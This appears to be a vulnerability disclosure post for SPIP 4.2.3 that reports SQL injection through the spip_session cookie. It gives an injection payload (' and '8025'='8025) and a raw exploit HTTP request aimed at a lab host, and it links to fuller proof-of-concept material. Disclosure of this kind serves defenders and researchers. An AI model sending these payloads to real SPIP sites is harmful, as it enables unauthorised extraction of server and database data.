SPIP 4.2.3 SQL Injection

## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server SideSensitive information Disclosure!## Author: nu11secur1ty## Date: 06.28.2023## Vendor: https://www.spip.net/en_rubrique25.html## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip## Reference: https://portswigger.net/web-security/information-disclosure## Description:The spip_session cookie appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the spip_session cookie, anda database error message was returned. Two single quotes were thensubmitted and the error message disappeared. You should review thecontents of the error message, and the application's handling of otherinput, to confirm whether a vulnerability is present.Additionally, the payload ' and '8025'='8025 were submitted in thespip_session cookie, and a database error message was returned.The attacker who has an account easily can dump almost all sensitiveinformation from the server. This is the wrong configuration of thesessions of this app and a serious bug in the backend execution -function modules of this app which bug is coming from the developmentteam of this web application! No one user account or even broadcastadmin account, must not be seeing inside information of the server,except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! fromthe side of the developers of this web app.STATUS: HIGH-CRITICAL Vulnerability[+]Exploit:```GETGET /pwnedhost7/ecrire/?exec=info HTTP/1.1Host: 192.168.100.45Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;spip_session=1_c9209323400f315bb516fdc7c5345eaeCache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)## Time spend:03:15:00